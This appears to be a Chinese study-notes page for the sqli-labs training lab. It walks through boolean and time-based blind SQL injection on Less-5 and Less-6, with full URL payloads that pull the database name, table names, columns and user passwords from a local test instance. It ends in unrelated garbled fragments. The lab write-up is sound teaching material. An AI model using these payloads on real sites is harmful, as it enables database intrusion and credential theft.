1.# 和 – (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用–+的方式来闭合,因为+会被解释成空格。
.
2.当然,也可以使用–%20,把空格转换为urlencode编码格式,也不会报错。同理把#变成%23,也不报错
。
less
less 5 布尔注入
爆数据库名:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27and%20left(database(),1)>'r'--+ 二分法尝试首字母,大于r有回显,大于s无回显,故库名是s开头
大于d有 小于e无:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27and%20left(database(),2)%3E%27sd%27--+
或者使用burp工具对参数爆破:
最小长度1,最大长度1,将26个字母逐个burp
省略。。。。
最终可得数据库名为:security
爆表名:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E101--+
从上到下,从左到右,ascii码依次对应 users ,即表名
尝试定向爆破,以提高手工注入速度,修改limit x,1 中的x查询password是否存在表中
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 %27%20and%20if(left((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users %27%20limit%203,1),8)=%27password%27%20,sleep(5),1)--+
在limit3,1回显成功,即第四列有字段password
同理查询到usename字段名
同理查询字段的值:
查询用户名dump:?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
查询密码dump:?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
或者逐位布尔判断:/Less-5/?id=1%27 and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+
less 6
单引换双引号,其余操作相同
文件输出,时间布尔盲注)
 安装PyTorch 1.8 的可行方案)
)
各种头部注入)
)
:isTensor()INTERNAL ASS)
堆叠等......)
)
)